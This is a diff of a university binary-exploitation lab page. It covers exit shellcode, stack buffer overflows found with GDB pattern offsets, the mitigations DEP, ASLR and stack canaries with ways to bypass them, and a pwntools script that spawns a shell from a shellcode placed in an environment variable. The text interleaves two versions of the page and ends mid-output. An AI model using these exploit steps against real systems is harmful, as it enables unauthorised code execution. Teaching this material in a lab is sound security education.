Differences

This shows you the differences between two versions of the page.

--- cns:labs:lab-06 [2017/11/12 19:28]
irina.presa [4. Ending with style: pwntools [2p]]
+++ cns:labs:lab-06 [2020/11/16 11:01] (current)
dennis.plosceanu [T1. GCC stack protector [1p]]
@@ Line 1: / Line 1: @@
-====== Lab 06 - Exploiting. Shellcodes ======
+====== Lab 06 - Exploit Protection Mechanisms ======
-===== Resources =====
-  * [[http://shell-storm.org/shellcode/|Shellstorm - A collection of shellcodes]]
+===== Introduction: Protection Mechanisms =====
-  * [[https://trailofbits.github.io/ctf/exploits/README.html|TrailofBits guide to exploiting binaries]]
-  * [[http://security.cs.pub.ro/hexcellents/wiki/|Hexcellents - A collection of binary exploitation resources]]
-===== Lab Support Files =====
+So far we've explored methods of abusing **vulnerabilities** in programs in order to gain control over them, using manual and/or automated techniques known as **exploits**. Ideally, programmers would carefully inspect code to remove all the possible vulnerabilities from their programs; in practice, however, even the most basic vulnerabilities (e.g. unchecked buffer bounds) can be easily found in the wild, which is why various hardware and software **protection mechanisms** were developed to mitigate attacks. We will study a few of these mechanisms in this lab, and we will find out how we can bypass them under certain scenarios.
-We will use this [[http://elf.cs.pub.ro/oss/res/labs/lab-06.tar.gz|lab archive]] throughout the lab.
+If we relate to the "stack buffer overflow" scenarios we have worked with in the past labs, we know intuitively that we want to stop at least two aspects of attacks:
-Please download the lab archive an then unpack it using the commands below:
+  * The attacker's ability to read/write memory they shouldn't, e.g. code pointers, in particular **return addresses** on the stack, and/or
-<code bash>
+  * The ability to inject **arbitrary code** into the program and execute this arbitrary code (shellcode).
-student@mjolnir:~$ wget http://elf.cs.pub.ro/oss/res/labs/lab-06.tar.gz
-student@mjolnir:~$ tar xzf lab-06.tar.gz
-</code>
-After unpacking we will get the ''lab-06/'' folder that we will use for the lab:
+We discuss some mitigation techniques in this section.
-<code bash>
+==== Code Integrity Protection ====
-student@mjolnir:~$ cd lab-06/
-student@mjolnir:~/lab-06$ ls
-bin_to_hex.sh  Makefile  shellcode_exit.S  skel_pwn.py  test_shellcode.c  vuln2.asm  vuln.asm
-</code>
-===== Intro =====
+The **code integrity** property is entailed by two principles:
-Whenever an attacker manages to overwrite the return address, his primary follow-up is to divert the execution flow to his advantage. One can gain a stable foothold inside the exploited system via spawning a shell from the vulnerable application.
+  * Arbitrary (non-code) data must be **non-executable**
+  * Code must be **non-writable** (read-only) and executable
-This can be accomplished by injecting code into the application's memory (stack, heap or by other means) and diverting the execution flow to that code. Please note the following prerequisites in order for this to work:
+This mechanism is also known as Data Execution Prevention (DEP) or "Write XOR Execute" (W⊕X).
-  - A vulnerability has to exist. If there is a bug which crashes the application, but cannot be leveraged in any way, then that particular attack path is cut short.
+The two requirements are enforced at various levels. Most modern hardware architectures enforce memory access permissions using virtual memory (paging): for example, on x86, execution permissions are determined using the **NX** (Non-Executable) bit, while write permissions are determined using the **RW** (Read/Write) bit. The operating system manages page tables, while the access policy is set by the compiler, linker and loader, as previously discussed in [[cns:labs:lab-03|Lab 03]] and [[cns:labs:lab-04|Lab 04]].
-  - The attacker must be able to write the desired code inside the program's memory. This area of memory, apart from being writable, should also be executable, which is extremely rare in today's binaries.
-  - Finally, the injected code should be reached somehow by diverting the execution of the binary towards it.
-Since the injected code's outcome is commonly that of spawning a shell, the name "shellcode" is used to describe a wide array of such code snippets. A "shellcode" could also create a new socket, or read the contents of a file and print it to the standard output.
+For example we can set stack access permissions by configuring the GCC linker via the ''-z'' flag with the ''execstack''/''noexecstack'' parameters:
-<note important>
+<code>
-For this lab, you need to disable ASLR by issuing the following command:
+$ gcc -z noexecstack -o main main.c
+</code>
-<code bash>
+<note>
-echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
+In newer versions of GCC ''noexecstack'' is the default policy. Remember that in previous labs we had to explicitly pass ''-z execstack'' to GCC in order to make the stack executable.
-</code>
 </note>
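The effect of the stack policy can be observed at run-time by looking at the permission column of ''/proc/<pid>/maps''. The following is a minimal Python sketch, not part of the lab archive; the helper names ''parse_maps_line'' and ''violates_wxorx'' are made up for illustration, and the script assumes a Linux system that exposes ''/proc/self/maps''.

```python
import os


def parse_maps_line(line):
    """Split one /proc/<pid>/maps line into (start, end, perms, name)."""
    fields = line.split()
    start, end = (int(x, 16) for x in fields[0].split("-"))
    perms = fields[1]
    # The pathname column is optional (anonymous mappings have none).
    name = fields[5] if len(fields) > 5 else ""
    return start, end, perms, name


def violates_wxorx(perms):
    """A mapping breaks W^X when it is both writable and executable."""
    return "w" in perms and "x" in perms


if __name__ == "__main__" and os.path.exists("/proc/self/maps"):
    # Inspect the mappings of this very Python process.
    with open("/proc/self/maps") as maps:
        for line in maps:
            start, end, perms, name = parse_maps_line(line)
            if name == "[stack]" or violates_wxorx(perms):
                print(f"{start:#x}-{end:#x} {perms} {name}")
```

To inspect a lab binary instead of the Python interpreter, the same parsing can be pointed at ''/proc/<pid>/maps'' of the running process; a stack line with ''rwx'' permissions would suggest the binary was linked with ''-z execstack''.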
-===== Tutorial [2p] =====
-Let's write a simple shellcode which performs
+<note important>
-<code C>
+**Bypassing code integrity** is possible through //code reuse//. For example if we want to obtain a shell, all we need to do is divert the control-flow to the ''system'' C library function with the ''%%"/bin/sh"%%'' parameter -- this is from a class of attacks known as //return-to-libc//. The fact that the vast majority of programs are linked with the C library makes this pretty easy.
-exit(1337);
-</code>
-==== Phase 1: Recon ====
+In general we can reuse existing code in the program to do what is known as //Return-Oriented Programming// (ROP). ROP is a very powerful technique: it was shown that the attacker may reuse small pieces of program code called "gadgets" to execute arbitrary (Turing-complete) operations! We will study ROP further in the upcoming labs.
+</note>
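As a rough illustration of the //return-to-libc// idea, the sketch below lays out a 32-bit payload that overwrites the return address with the address of ''system'' and places a pointer to ''%%"/bin/sh"%%'' where ''system'' expects its first argument. All addresses and the offset are placeholders chosen for the example (they are not taken from the lab binaries), and the helper name ''ret2libc_payload'' is hypothetical.

```python
import struct


def ret2libc_payload(ret_offset, system_addr, exit_addr, binsh_addr):
    """Build a 32-bit cdecl layout: padding | &system | fake return | arg."""
    payload = b"A" * ret_offset               # fill up to the saved return address
    payload += struct.pack("<I", system_addr)  # overwritten return address
    payload += struct.pack("<I", exit_addr)    # where system() "returns" to
    payload += struct.pack("<I", binsh_addr)   # first argument of system()
    return payload


# Placeholder values only; real ones must be found in the target process.
payload = ret2libc_payload(16, 0xf7e12345, 0xf7e05678, 0xf7f5abcd)
print(payload.hex())
```

No byte of this payload is executed from the stack, which is why a non-executable stack alone does not stop it.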
-We have the following blatantly vulnerable program:
+<note important>
+**Bypassing code integrity (2)**: while ''-z noexecstack'' will ensure that the stack memory area is set as non-executable by the loader, this doesn't rule out the possibility for an attacker to make it executable at run-time, e.g. by calling ''mprotect''.
+</note>
+==== Address Space Layout Randomization ====
-<code asm>
+So far we've seen that it's pretty easy to obtain the approximate or exact address of a memory location (e.g. buffer) by assuming it was leaked (through a ''printf'') or by looking in GDB. The technique known as //Address Space Layout Randomization// (ASLR) works by trying to deny the attacker this information: it places as many program segments as possible at **randomly chosen** addresses, thus providing a level of **probabilistic protection**.
-extern gets
-extern printf
-section .data
+On x86 it is possible to randomize the following segments:
-formatstr: db "Enjoy your leak: %p",0xa,0
-section .text
+  * The **stack** is easily randomizable, as all stack addresses are relative to ''esp'' or ''ebp''
-global main
+  * **Global data** may be randomized, if e.g. the base of the data segment is set to a random address
-main:
+  * **Code** can only be randomized by compiling the program as Position Independent Code/Position Independent Executable; this is the default for shared libraries, but otherwise executable code is usually placed at fixed addresses
-	push ebp
-	mov ebp, esp
-	sub esp, 64
-	lea ebx, [ebp - 64]
-	push ebx
-	push formatstr
-	call printf
-	push ebx
-	call gets
-	add esp, 4
-	leave
-	ret
-</code>
-You may already see what the vulnerability consists of.
+Note that randomization occurs at **load-time**, which means that the segment addresses **do not** change while the process is running.
-==== Phase 2: Finding the vulnerability ====
+<note important>
+**Bypassing ASLR** is possible through at least one of the following methods, some of which we will employ throughout the lab.
-We are going to use some of PEDA's features to our advantage:
+**Bruteforce**. If the attacker is able to inject payloads multiple times without crashing the application, they can bruteforce the address they are interested in (e.g., a target in libc). Otherwise, they can just run the exploit multiple times until they guess the correct target.
-<code asm>
+**NOP sled**. In the case of shellcodes, a longer NOP sled will maximize the chances of jumping inside it and eventually reaching the exploit code even if the stack address is randomized.
-gdb-peda$ pattc 100 # Generate a De Bruijn pattern of length 100
-'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
-gdb-peda$ r
-Starting program: /vuln
-AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
-Program received signal SIGSEGV, Segmentation fault.
+**Restrict entropy**. There are various ways of reducing the entropy of the randomized address. For example, the attacker can decrease the initial stack size by setting a huge amount of dummy environment variables.
- [----------------------------------registers-----------------------------------]
+**Information leak**. The most effective way of bypassing ASLR is by using an information leak vulnerability that exposes a randomized address, or at least parts of it. The attacker can also dump parts of libraries (e.g., libc) if they are able to create an exploit that reads them. In remote attacks this is useful for inferring the version of the library, downloading it from the web, and thus learning the right GOT offsets for other functions (not originally linked with the binary).
-EAX: 0xfff088f8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
+</note>
-EBX: 0xfff088f8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-ECX: 0xf77495a0 --> 0xfbad2288
-EDX: 0xf774a87c --> 0x0
-ESI: 0xf7749000 --> 0x1aedb0
-EDI: 0xf7749000 --> 0x1aedb0
-EBP: 0x41644141 ('AAdA')
-ESP: 0xfff08940 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-EIP: 0x41413341 ('A3AA')
-EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
-[-------------------------------------code-------------------------------------]
-Invalid $PC address: 0x41413341
-[------------------------------------stack-------------------------------------]
-| 0xfff08940 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xfff08944 ("AA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xfff08948 ("AJAAfAA5AAKAAgAA6AAL")
-| 0xfff0894c ("fAA5AAKAAgAA6AAL")
-| 0xfff08950 ("AAKAAgAA6AAL")
-| 0xfff08954 ("AgAA6AAL")
-| 0xfff08958 ("6AAL")
-| 0xfff0895c --> 0xf779ac00 --> 0x1
-[------------------------------------------------------------------------------]
-Legend: code, data, rodata, value
-Stopped reason: SIGSEGV
-0x41413341 in ?? ()
-gdb-peda$ patto A3AA # Find offset within pattern
-A3AA found at offset: 68
-</code>
-Notice that the program crashed. We can quickly determine that the program tried to return to **0x41413341**, which is in an unmapped region of memory, and thus triggered a fault. This value corresponds to the unique quad group "A3AA" found at offset 68 in the pattern. This offset is where the return address is situated relative to our input.
+<note>
+Linux allows 3 options for its ASLR implementation, which can be configured using the ''/proc/sys/kernel/randomize_va_space'' file. Writing 0, 1, or 2 to this file results in the following behaviors:
-==== Phase 3: Reliable crash ====
+  * **0**: deactivated
+  * **1**: random stack, vdso, libraries; data is after code section
+  * **2**: random data too
+</note>
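The current setting can also be read programmatically. The sketch below is only an illustration: the helper names ''describe_aslr'' and ''read_aslr_setting'' are made up, and the descriptions simply restate the three values listed above.

```python
# Descriptions restate the three documented values of randomize_va_space.
ASLR_MODES = {
    0: "disabled",
    1: "random stack, vdso, libraries; data is after code section",
    2: "same as 1, plus random data",
}


def describe_aslr(value):
    """Map a randomize_va_space value to a human-readable description."""
    return ASLR_MODES.get(value, "unknown setting")


def read_aslr_setting(path="/proc/sys/kernel/randomize_va_space"):
    """Return the current setting as an int, or None if it cannot be read."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


setting = read_aslr_setting()
if setting is None:
    print("could not read the ASLR setting (not Linux, or no /proc?)")
else:
    print(f"randomize_va_space = {setting}: {describe_aslr(setting)}")
```

Reading the file does not require root; only writing a new value does.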
-Now that we know the offset from the beginning of the buffer (and also, our input) as being 68, we can attempt to reliably crash the program to a destination of our choice. Let's try having **'BBBB'** as our return address, or **0x42424242**, preceded by 68 'A's.
+<note important>
+ASLR is by default disabled within GDB PEDA. To turn ASLR on in GDB PEDA run:
+<code>
+gdb-peda$ aslr on
+</code>
+Or, in GDB (non-PEDA) run:
+<code>
+(gdb) set disable-randomization off
+</code>
-We can construct this test sequence using python from the command line:
+To check the ASLR status in GDB PEDA run:
-<code bash>
+<code>
-python -c "print 'A'*68 + 'BBBB'"
+gdb-peda$ aslr
 </code>
-We can now rerun the binary under gdb and see what happens.
+To check the ASLR status in GDB run:
+<code>
+(gdb) show disable-randomization
+</code>
+</note>
+==== Stack Protection: Canaries ====
-<code asm>
+Assuming we have a program ''p'' that is vulnerable to a stack-based buffer overflow in function ''f'', the program flow will normally be the following:
-gdb-peda$ r
-Starting program: /vuln
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
-Program received signal SIGSEGV, Segmentation fault.
+  - Caller calls ''f'': return address ''ret'' is pushed on the stack
+  - ''f'' executes: the attacker can overflow a buffer and overwrite ''ret''
+  - Callee returns from ''f'' to potentially modified ''ret''
- [----------------------------------registers-----------------------------------]
+The compiler or the programmer can easily provide some protection by inserting a special value (unknown to the attacker) between the buffer and the return address. This value is known as a **canary**. The figure below illustrates its placement on the stack:
-EAX: 0xffb0e678 ('A' <repeats 68 times>, "BBBB")
-EBX: 0xffb0e678 ('A' <repeats 68 times>, "BBBB")
-ECX: 0xf77905a0 --> 0xfbad2288
-EDX: 0xf779187c --> 0x0
-ESI: 0xf7790000 --> 0x1aedb0
-EDI: 0xf7790000 --> 0x1aedb0
-EBP: 0x41414141 ('AAAA')
-ESP: 0xffb0e6c0 --> 0x0
-EIP: 0x42424242 ('BBBB')
-EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
-[-------------------------------------code-------------------------------------]
-Invalid $PC address: 0x42424242
-[------------------------------------stack-------------------------------------]
-| 0xffb0e6c0 --> 0x0
-| 0xffb0e6c4 --> 0xffb0e754 --> 0xffb1018e ("/vuln")
-| 0xffb0e6c8 --> 0xffb0e75c --> 0xffb101c0 ("LC_PAPER=ro_RO.UTF-8")
-| 0xffb0e6cc --> 0x0
-| 0xffb0e6d0 --> 0x0
-| 0xffb0e6d4 --> 0x0
-| 0xffb0e6d8 --> 0xf7790000 --> 0x1aedb0
-| 0xffb0e6dc --> 0xf77e1c04 --> 0x0
-[------------------------------------------------------------------------------]
-Legend: code, data, rodata, value
-Stopped reason: SIGSEGV
-0x42424242 in ?? ()
-</code>
-Excellent!
+{{ :cns:labs:stack_canary_illustration.png?nolink&500 |}}
-==== Phase 4: Writing the shellcode ====
+Thus the program logic becomes:
-Shellcode is typically written in assembly, due to memory constraints.
+  - Caller calls ''f'': return address ''ret'' is pushed on the stack
+  - Callee pushes a random value ''v'' on the stack and writes it somewhere else for reference
+  - ''f'' executes: the attacker can overflow a buffer and overwrite ''ret'', but only by also overwriting ''v'', which sits between the buffer and ''ret''
+  - Callee returns from ''f'': the value of ''v'' is checked; if it has changed, abort, otherwise return to ''ret''
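The steps above can be modelled with a toy simulation. This is only a sketch of the logic, not how GCC implements it: the "stack frame" is a Python ''bytearray'', the names ''call_with_canary'' and ''BUF_SIZE'' are made up, and the return address ''0x08048abc'' is a placeholder.

```python
import os
import struct

BUF_SIZE = 16
ORIGINAL_RET = 0x08048abc  # placeholder return address


def call_with_canary(user_input, canary=None):
    """Simulate one call: returns ("return", address) or ("abort", None)."""
    if canary is None:
        canary = os.urandom(4)  # random value v, kept aside for reference
    # Frame layout, low to high addresses: buffer | canary | return address.
    frame = bytearray(BUF_SIZE) + canary + struct.pack("<I", ORIGINAL_RET)
    # Unchecked copy: input longer than BUF_SIZE spills into canary and ret.
    frame[:len(user_input)] = user_input
    # Function epilogue: compare the stack copy against the reference value.
    if bytes(frame[BUF_SIZE:BUF_SIZE + 4]) != canary:
        return ("abort", None)
    ret = struct.unpack("<I", bytes(frame[BUF_SIZE + 4:BUF_SIZE + 8]))[0]
    return ("return", ret)


print(call_with_canary(b"A" * BUF_SIZE))        # fits in the buffer
print(call_with_canary(b"A" * (BUF_SIZE + 8)))  # smashes canary and ret
```

The model also shows the limit of the scheme: an input that happens to write the correct canary bytes back in place passes the check even though ''ret'' was modified.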
-How do we start writing our //exit// shellcode? First, we need to know how system calls are performed on our target platform (x86 in our case).
+Canary values can be enabled [[http://wiki.osdev.org/Stack_Smashing_Protector|in GCC]] through the ''-fstack-protector'' set of flags. We will examine its usage in the tutorial section of this lab.
-Each system call has a specific number which identifies it. This number must be stored in EAX. Next, the arguments of the system call are placed in EBX, ECX, EDX, ESI, EDI, in this order. A special software interrupt is used to issue the actual system call, **int 0x80**.
+<note important>
+**Bypassing stack canaries**. We make the following observations:
-Consult the Linux x32 ABI [[http://security.cs.pub.ro/hexcellents/wiki/kb/exploiting/linux_abi_x32|here]]
+  * Stack canaries only protect against //buffer overflows//. Arbitrary memory writes (e.g. to offsets that can be controlled by the attacker) may be crafted so that they do not touch the canary value.
+  * Stack canaries are vulnerable to the same set of attacks as ASLR. Guessing the canary value, e.g. through an information leak or through brute force, is possible and will bypass the protection. Modifying the reference value is also (at least theoretically) possible (the value may be held [[http://wiki.osdev.org/Stack_Smashing_Protector#Implementation|in a global variable]], in which case the attacker regains complete control of the stack).
+</note>
+===== Tutorials =====
-We need to place **1** (exit's system call number) in EAX, and the value of exit's single argument in EBX.
+All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]].
-Our shellcode will look as follows:
+==== T1. GCC stack protector ====
-<code asm>
+Take a look at ''vulnerable.c'' in the [[http://elf.cs.pub.ro/oss/res/labs/lab-06.tar.gz|lab archive]]. We are interested in particular in the ''%%get_user_input%%'' function, which ''read''s from standard input into a local buffer more bytes than are available:
-BITS 32
-mov eax, 1
+<code C>
-mov ebx, 1337
+void get_user_input(void)
-int 0x80
+{
+	char buf[BUFFER_SIZE];
+	read(STDIN_FILENO, buf, 8*BUFFER_SIZE);
+}
 </code>
-But we can't pass it as assembly instructions to the application; we need to assemble it into binary as well.
+We can overflow ''buf'' into ''%%get_user_input%%'''s return address and obtain control of the program, using the three-step approach studied in the previous labs:
-<code bash>
+  - Input a large input string that crashes the process
-nasm shellcode_exit.S -o shell.bin
+  - Determine the offset into the string that overwrites the return address
+  - Determine the address where to jump, e.g. a fixed function or a shellcode placed on the stack
+For now we're only interested in the first step. Let's compile ''vulnerable'' and provide it an arbitrary payload:
+<code>
+$ make vulnerable
+cc -m32 -c -m32 -Wall -Wextra -Wno-unused-function -Wno-unused-variable -g -O0 -fno-stack-protector -o vulnerable.o vulnerable.c
+cc -m32 -z execstack  vulnerable.o   -o vulnerable
+$ python -c 'print("A"*20)' | ./vulnerable
+Segmentation fault
+$ dmesg | tail -n 1
+[14935.316385] vulnerable[29090]: segfault at 41414141 ip 0000000041414141 sp 00000000ffcd9880 error 14 in libc-2.24.so[f753b000+1b1000]
 </code>
-We now need this binary code as a stream of hex values in order to use python/perl/echo to feed it into the application.
+We can thwart the attack in this phase by building our binary with the ''-fstack-protector-all'' flag, which ensures that the stack canary instrumentation will be applied to all the functions. The Makefile can be used to compile this into ''vulnerable-ssp'':
-<code bash>
+<code>
-hexdump -v -e '1/1 "\\"' -e '1/1 "x%02x"' shell.bin ; echo
+$ make vulnerable-ssp
+cc -m32 -c -m32 -Wall -Wextra -Wno-unused-function -Wno-unused-variable -g -O0 -fstack-protector-all -o vulnerable-ssp.o vulnerable.c
+cc -m32 -z execstack  vulnerable-ssp.o   -o vulnerable-ssp
 </code>
-or
+Now let's try to inject the payload again:
-<code bash>
+<code>
-xxd -c 1 -p shell.bin | awk '{ print "\\x" $0 }' | paste -sd ""
+$ python -c 'print("A"*20)' | ./vulnerable-ssp
+*** stack smashing detected ***: ./vulnerable-ssp terminated
+======= Backtrace: =========
+/lib/i386-linux-gnu/libc.so.6(+0x6733a)[0xf762f33a]
+/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xf76bfd27]
+/lib/i386-linux-gnu/libc.so.6(+0xf7ce8)[0xf76bfce8]
+./vulnerable-ssp[0x80484a1]
+./vulnerable-ssp[0x804840a]
+======= Memory map: ========
 </code>
-or just use the conveniently supplied **bin_to_hex.sh** script.
+We observe that the GCC stack protector run-time detected our attempt to smash the stack and aborted the program.
+/*
+<note important>
+Try injecting payloads of various sizes (e.g. 20, 24, 16 bytes) and see what happens. In some cases, the program crashes with a segmentation fault before it gets to print the backtrace. Why is that?
+</note>
+*/
+==== T2. Recap: injecting the shellcode using environment variables  ====
-In order to test your shellcode, you can use **xxd** to export the shellcode as a C array and test it using the **test_shellcode** program in the archive.
+Let's try to exploit ''vulnerable'', assuming that both the stack protector and ASLR are disabled. We make sure to disable ASLR using:
-<code bash>
+<code>
-xxd -i shell.bin > shellcode
+$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
 </code>
-By running **test_shellcode** under **strace**, you can check to see exactly if the system call was performed, and with which arguments. If all else fails, **gdb**.
+For now let's use GDB to find where we need to place the return address in our input:
-<code bash>
+<code asm>
-strace -e exit ./test_shellcode
+$ gdb -q ./vulnerable
-strace: [ Process PID=5155 runs in 32 bit mode. ]
+Reading symbols from ./vulnerable...done.
-exit(1337)                              = ?
+gdb-peda$ pattc 100
-+++ exited with 57 +++
+'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
+gdb-peda$ r < <(echo 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL')
+...
+EIP: 0x41434141 ('AACA')
+...
+Legend: code, data, rodata, value
+Stopped reason: SIGSEGV
+0x41434141 in ?? ()
+gdb-peda$ patto AACA
+AACA found at offset: 16
 </code>
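The idea behind ''pattc''/''patto'' can be reproduced in a few lines of Python. The sketch below does **not** generate PEDA's pattern; it uses a simpler upper/lower/digit scheme (in the style of other pattern generators) purely to illustrate how a unique 4-byte window maps back to an offset. The function names are made up for the example.

```python
import string
import struct


def make_pattern(length):
    """Build 'Aa0Aa1Aa2...' so that short windows identify their offset."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length].encode()
    raise ValueError("requested length exceeds what this scheme can cover")


def find_offset(pattern, eip_value):
    """Locate the little-endian bytes of a crashed EIP inside the pattern."""
    return pattern.find(struct.pack("<I", eip_value))


pattern = make_pattern(100)
# Pretend the process crashed with the 4 bytes found at offset 16 in EIP.
crashed_eip = struct.unpack("<I", pattern[16:20])[0]
print(find_offset(pattern, crashed_eip))
```

Note that the EIP value is packed as little-endian before searching, which is the same byte-order conversion ''patto'' performs when given a register value.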
-==== Phase 5: Placing the shellcode ====
+We now know that the return address is found at offset 16 from the buffer's start. While this is good enough for us, one issue is that the buffer is a bit too small to hold a shellcode. So to make our life easy, let's use the ''SHELLCODE'' environment variable to hold the shellcode.
-Use the supplied **bin_to_hex.sh** script to convert a binary file to a hex representation. You can also do one final view of the shellcode using **objdump**:
+<note important>
+Remember that environment variables are placed on the stack, along with ''argv''. It doesn't really matter whether the victim program uses that variable or not: the OS will place it there anyway, and it can be used to inject malicious code or data.
+</note>
+Now let's try to find the approximate address at which the shellcode is placed -- remember that we turned ASLR off, so even if the environment changes a little, we can still make a good guess using GDB.
 <code asm>
-objdump -D -b binary -M intel -m i386 shell.bin
+$ SHELLCODE=$(python -c 'print("C" * 1000)') gdb -q ./vulnerable
-shell.bin:     file format binary
+Reading symbols from ./vulnerable...done.
+gdb-peda$ r < <(python -c 'print("A" * 16 + "BBBB")')
+...
+RBP: 0x4141414141414141 ('AAAAAAAA')
+...
+Legend: code, data, rodata, value
+Stopped reason: SIGSEGV
+0x42424242 in ?? ()
+gdb-peda$ searchmem "CCCCC"
+Searching for 'CCCCC' in: None ranges
+Found 200 results, display max 200 items:
+[stack] : 0x7fffffffeba4 ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffeba9 ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffebae ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffebb3 ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffebb8 ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffebbd ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffebc2 ('C' <repeats 200 times>...)
+...
+</code>
-Disassembly of section .data:
+Thus so far we know that:
-00000000 <.data>:
+  * The return address is at offset 16 in our input
-   0:	b8 01 00 00 00       	mov    eax,0x1
+  * The ''SHELLCODE'' environment variable will be placed at approximately ''0x7fffffffeba4''. We expect this to vary quite a bit though, as the process running under GDB uses a different environment that affects stack addresses (environment variables are also stored on the stack). Moreover, the address will be different when running it under different systems.
-   5:	bb 39 05 00 00       	mov    ebx,0x539
-   a:	cd 80                	int    0x80
-</code>
-First, let's determine the length of our shellcode:
+Given this, we can already write a skeleton for our exploit:
-<code bash>
+<code python exploit-t2.py>
-python -c "print len('$(./bin_to_hex.sh shell.bin)')"
+#!/usr/bin/env python
-</code>
-Next, we'll need to fill our buffer up to 68 characters until the saved return address is reached on the stack.
+from pwn import *
-<code bash>
+context.binary = "./vulnerable"
-python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(68-12)"
-</code>
-==== Phase 6: Diverting control flow ====
+# Generate vars: a shellcode, return address offset, target address.
+shellcode = asm(shellcraft.sh())
+ret_offset = 16
+target = 0x7fffffffeba4
-Now we need to find the beginning of our buffer on the stack in order to return to it. Repeat the experiment and set a breakpoint at the **leave** instruction. Write down the address of the beginning of your buffer on the stack, cause that's where the shellcode will end up.
+# Generate process, with SHELLCODE as an env var.
+io = process('./vulnerable', env= { 'SHELLCODE' : shellcode })
-<code asm>
+# Craft payload.
-gdb-peda$ b *0x8048422
+payload = b"A" * ret_offset
-Breakpoint 1 at 0x8048422
+payload += pack(target)
-gdb-peda$ r
-Starting program: /vuln
-AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
- [----------------------------------registers-----------------------------------]
+# Send payload.
-EAX: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
+io.sendline(payload)
-EBX: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-ECX: 0xf7fac5a0 --> 0xfbad2288
-EDX: 0xf7fad87c --> 0x0
-ESI: 0xf7fac000 --> 0x1aedb0
-EDI: 0xf7fac000 --> 0x1aedb0
-EBP: 0xffffcef8 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-ESP: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-EIP: 0x8048422 (<main+18>:	leave)
-EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
-[-------------------------------------code-------------------------------------]
-x8048419 <main+9>:	push   ebx
-x804841a <main+10>:	call   0x80482e0 <gets@plt>
-x804841f <main+15>:	add    esp,0x4
-=> 0x8048422 <main+18>:	leave
-x8048423 <main+19>:	ret
-x8048424 <main+20>:	xchg   ax,ax
-x8048426 <main+22>:	xchg   ax,ax
-x8048428 <main+24>:	xchg   ax,ax
-[------------------------------------stack-------------------------------------]
-| 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffcebc ("AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffcec0 ("ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffcec4 ("$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffcec8 ("AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
